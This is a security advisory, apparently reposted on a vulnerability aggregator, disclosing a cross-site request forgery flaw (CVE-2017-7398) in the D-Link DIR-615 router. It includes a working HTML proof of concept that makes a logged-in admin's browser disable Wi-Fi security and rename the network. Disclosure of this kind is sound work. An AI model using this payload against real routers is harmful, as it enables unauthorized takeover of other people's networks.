Lucene search
K

D-Link DIR-615 HW T1 FW 20.09 Cross-Site Request Forgery Vulnerability

🗓️ 04 Apr 2017 00:00:00Reported by PratikType 
zdt
 zdt
🔗 0day.today👁 42 Views

D-Link DIR-615 vulnerable to Cross-Site Request Forgery (CSRF) attack enabling unauthorized actions on the wireless router

Related
Code
ReporterTitlePublishedViews
Family
CNVD
D-Link DIR 615 HW Cross-Site Request Forgery Vulnerability
6 Apr 201700:00
cnvd
Check Point Advisories
DLink DIR-615 Cross Site Request Forgery (CVE-2017-7398)
4 Oct 202000:00
checkpoint_advisories
CVE
CVE-2017-7398
4 Apr 201714:00
cve
Cvelist
CVE-2017-7398
4 Apr 201714:00
cvelist
Exploit DB
D-Link DIR-615 - Cross-Site Request Forgery
5 Apr 201700:00
exploitdb
EUVD
EUVD-2017-16423
7 Oct 202500:30
euvd
exploitpack
D-Link DIR-615 - Cross-Site Request Forgery
5 Apr 201700:00
exploitpack
NVD
CVE-2017-7398
4 Apr 201714:59
nvd
OSV
CVE-2017-7398
4 Apr 201714:59
osv
Packet Storm
D-Link DIR-615 Cross Site Request Forgery
5 Apr 201700:00
packetstorm
Rows per page
*Title:*
====

D-Link DIR 615 HW: T1 FW:20.09 is vulnerable to Cross-Site Request Forgery
(CSRF) vulnerability



*Credit:*
======

Name: Pratik S. Shah



*Reference:*
=========

CVE Details: CVE-2017-7398.



*Date:*
====

1-04-2017



*Vendor:*
======

D-Link wireless router



*Product:*
=======

DIR-615


*Affected Version:*
=============

Hardware: T1 , Firmware: 20.09



*Abstract:*
=======

D-Link DIR 615 (HW: T1 FW:20.09) is vulnerable to Cross-Site Request
Forgery (CSRF) vulnerability. This enables an attacker to perform an
unwanted action on a wireless router for which the user/admin is currently
authenticated.



*Attack Type**:*
===================

Remote



*Details:*
=========

CSRF vulnerability in D-link DIR 615 wireless router enables an attacker to
perform unwanted actions on router, which may lead to gaining full control
of the device.



*Proof Of Concept:*
================

1) User login to D-link DIR 615 wireless router

2) User visits the attacker's malicious web page (DlinkCSRF.html)

3) DlinkCSRF.html exploits CSRF vulnerability and changes the Security
Options to None



This is the CSRF POC for changing the Security option from WPA2 to None(
Parameter: Method)

Attacker can also tamper following parameters

- *hiddenSSID*
- *SSID*
- *Passwords for all the applicable security options*



<html>

<!-- CSRF PoC - D-link DIR 615 HW:T1 FW:20.09 -->

<body>

<form action="http://192.168.0.1/form2WlanBasicSetup.cgi"; method="POST">
<input type="hidden" name="domain" value="1" />
<input type="hidden" name="hiddenSSID" value="on" />
<input type="hidden" name="ssid" value=“Hacked” />
<input type="hidden" name="band" value="10" />
<input type="hidden" name="chan" value="0" />
<input type="hidden" name="chanwid" value="1" />
<input type="hidden" name="txRate" value="0" />
<input type="hidden" name="method&#95;cur" value="6" />
<input type="hidden" name="method" value="0" />
<input type="hidden" name="authType" value="1" />
<input type="hidden" name="length" value="1" />
<input type="hidden" name="format" value="2" />
<input type="hidden" name="defaultTxKeyId" value="1" />
<input type="hidden" name="key1" value="0000000000" />
<input type="hidden" name="pskFormat" value="0" />
<input type="hidden" name="pskValue" value=“[email protected]” />
<input type="hidden" name="checkWPS2" value="1" />
<input type="hidden" name="save" value="Apply" />
<input type="hidden" name="basicrates" value="15" />
<input type="hidden" name="operrates" value="4095" />
<input type="hidden" name="submit&#46;htm&#63;wlan&#95;basic&#46;htm"
value="Send" />
<input type="submit" value="Submit request" />

</form>
</body>
</html>



Disclosure Timeline:
======================================
Vendor Notification: 6th March 2017


--

Pratik S. Shah

#  0day.today [2018-01-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation